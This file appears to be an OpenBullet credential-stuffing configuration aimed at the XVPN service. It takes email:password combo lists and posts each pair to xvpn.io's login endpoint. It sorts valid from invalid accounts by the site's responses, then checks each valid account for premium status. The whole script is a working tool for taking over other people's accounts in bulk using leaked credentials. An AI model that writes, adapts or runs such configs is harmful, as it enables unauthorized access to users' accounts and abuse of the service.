[SETTINGS]
{
  "Name": "XVPN",
  "SuggestedBots": 1,
  "LastModified": "2019-04-09T17:57:49.2724204+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Acemy#7578",
  "Version": "1.2.1.3",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://xvpn.io/?n=best.free.xvpn.LoginAction" 
  CONTENT "Username=<USER>&Password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authority: xvpn.io" 
  HEADER "method: POST" 
  HEADER "path: /?n=best.free.xvpn.LoginAction" 
  HEADER "scheme: https" 
  HEADER "origin: https://xvpn.io" 
  HEADER "referer: https://xvpn.io/" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"type\":\"redirect\",\"msg\":\"\",\"url\":\"/?n=best.free.xvpn.AccountPage\"}" 
  KEYCHAIN Failure OR 
    KEY "This email doesn't exist, try another?" 
    KEY "The password is incorrect" 

REQUEST GET "https://xvpn.io/?n=best.free.xvpn.AccountPage" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authority: xvpn.io" 
  HEADER "method: GET" 
  HEADER "path: /?n=best.free.xvpn.AccountPage" 
  HEADER "scheme: https" 
  HEADER "referer: https://xvpn.io/" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Your account does not have an active premium." 

